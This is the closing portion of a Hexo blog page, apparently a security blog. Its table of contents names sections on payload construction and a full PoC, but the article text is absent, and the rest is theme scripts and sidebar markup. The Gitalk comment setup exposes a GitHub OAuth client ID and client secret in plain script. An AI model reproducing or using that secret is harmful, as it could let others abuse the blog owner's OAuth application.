class="toc-link" href="#payload%E6%9E%84%E9%80%A0"><span class="toc-number">1.3.3.</span> <span class="toc-text">payload构造</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4Poc-1"><span class="toc-number">1.3.4.</span> <span class="toc-text">完整Poc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%BA%E9%99%B7"><span class="toc-number">1.3.5.</span> <span class="toc-text">缺陷</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">46</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">7</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">71</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>






  
<script src="https://npm.webcache.cn/gitalk/dist/gitalk.min.js" data-pjax></script>

  
  <script data-pjax>
    var gitalkId = location.pathname;
    var gitalk = new Gitalk({
      clientID: '0efb4a442bc09d1ba17e',
      clientSecret: 'd26f520fef841de4f4388029a0d5c0f4730357cf',
      repo: 'https://github.com/Yyjccc/yyjccc.github.io.git',
      owner: 'Yyjccc',
      admin: "Yyjccc",
      id: gitalkId, // Ensure uniqueness and length less than 50
      distractionFreeMode: false // Facebook-like distraction free mode
    })
    if (document.getElementById('comments')) {
      gitalk.render('comments')
    }
  </script>







  
<script src="/js/generator_search.js" defer></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>




  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.0-alpha.1' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  

<script data-pjax>
  var updateTime = _$('#post-update-time')?.innerHTML;

  if (updateTime) {
    const update = new Date(updateTime);
    const now = new Date();
    const diff = now - update;
    const days = diff / 86400000;
    const { daysAgo, message: template } = window.outdate;
    if (days >= daysAgo) {
      const message = template.replace(/{time}/, updateTime);
      const blockquote = _$('#outdate-blockquote');
      if (blockquote) {
        blockquote.querySelector('p').innerText = message;
        blockquote.style.display = 'block';
      }
    }
  }
</script>


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script><!-- hexo-inject:begin --><!-- hexo-inject:end --></body>
  </html>

